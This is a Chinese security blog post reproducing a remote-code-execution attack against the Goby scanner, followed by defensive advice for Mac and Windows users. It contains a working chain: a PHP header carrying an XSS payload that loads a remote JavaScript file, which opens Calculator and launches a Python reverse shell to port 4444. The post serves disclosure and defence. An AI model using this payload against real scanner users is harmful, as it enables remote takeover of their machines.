反制 Goby RCE 復現及 Mac 用户防禦策略

語言: CN / TW / HK

點擊藍字

關注我們

聲明

本文作者:TeamsSix

本文字數:1431

閲讀時長:5 分鐘

附件/鏈接 :點擊查看原文下載

本文屬於【狼組安全社區】原創獎勵計劃,未經許可禁止轉載

由於傳播、利用此文所提供的信息而造成的任何直接或者間接的後果及損失,均由使用者本人負責,狼組安全團隊以及文章作者不為此承擔任何責任。

狼組安全團隊有對此文章的修改和解釋權。如欲轉載或傳播此文章,必須保證此文章的完整性,包括版權聲明等全部內容。未經狼組安全團隊允許,不得任意修改或者增減此文章內容,不得以任何方式將其用於商業目的。

最近看到網上反制 Goby 的文章,而自己平時 Mac 一直是裸奔的狀態,這下整的自己有點慌了,下面就來記錄下反制 Goby RCE 的復現以及 Mac 用户的防禦策略。

一、

反制 Goby RCE 復現

為了方便,這裏直接使用 PhpStudy 了,這裏的 PhpStudy 地址為 http://172.16.214.4 ,直接將 Web 服務裏的 index.php 改為以下內容。

<?php
header("X-Powered-By: PHP/<img src=1 onerror=alert(\"TeamsSix@WgpSec\")>");
?>

Goby 在掃描到 http://172.16.214.4 後,點擊掃描結果裏的 172.16.214.4  就會彈窗了。

注意掃描結果裏一定要點擊對應的 IP 才行,比如我這裏的 IP 是 172.16.214.4,不然是觸發不了的

復現 RCE 需要再新建一個 js 文件,這裏我在 172.16.214.4 的 www 目錄下新建了一個名為 mac 的 js 文件,js 內容如下:

(function(){
require('child_process').exec('open /System/Applications/Calculator.app');
require('child_process').exec('python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.214.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'');
})();

執行這段 JS 會在本地打開計算器,並利用 Python 反彈 Shell 到 172.16.214.4 主 機的 4444 端口

之後將 index.php 修改如下:

<?php
header("X-Powered-By: PHP/<img src=1 onerror=import(unescape('http%3A//172.16.214.4/mac.js'))>");
?>

172.16.214.4 上使用 NC 開啟 4444 端口監聽後,Goby 開啟掃描,點擊掃描結果裏的 172.16.214.4 的詳細信息,成功反彈 Shell

二、

Mac 用户防禦策略

裸奔的 Mac 真的是一反彈一個準,太沒安全感了,於是在師傅們的推薦下,入手了 little snitch,little snitch 官網鏈接:https://www.obdev.at/products/littlesnitch

聲明下這個不是廣告啊,只是分享下自己在 Mac 中的防禦方法而已

little snitch 可以用來監控 Mac 中所有的聯網行為,界面長這個樣子,個人覺着還是挺漂亮的。

實測下來,還是不錯的,即使在 Silent 模式下,當監測到有異常連接行為時也會告警,在使用過程中也是能成功攔截到反彈 Shell 請求的。

不過 little snitch 是付費的,個人覺着買個家庭裝是比較划算的,家庭裝支持 5 台設備,幾個小夥伴拼個單,每個人約合 94 元,另外比較良心的是這個有效期是永久的。

一向習慣了白嫖的我,想了想為了安全還是剁手了,畢竟我可不想那天被反制了,要是被反制了那就 GG 了。

説到這裏也許會有人好奇,為啥不説説 Windows 用户的防禦策略,於是我自己實際測試了一下,發現在 Windows 下裝個殺軟就行了,這裏以火絨為例,當監測到反彈 Shell 動作時,火絨會直接彈出告警,所以感覺 Windows 就沒啥好説的了。

本篇文章沒有過多贅述產生原因細節等,因為主要是想分享下自己的防禦策略,具體的漏洞細節參考下面的參考文章即可。

不過文中提到的也只是個臨時防護方案,存在被繞過的風險,目前 Goby 官方已經發布了最新版本修復了這個漏洞,各位小夥伴趕緊升級到最新版本吧~

參考文章: https://mp.weixin.qq.com/s/tl17-Qz-VXpSlZtZWDgeHg

TeamsSix

掃描關注公眾號回覆加羣

和師傅們一起討論研究~

WgpSec狼組安全團隊

微信號:wgpsec

Twitter:@wgpsec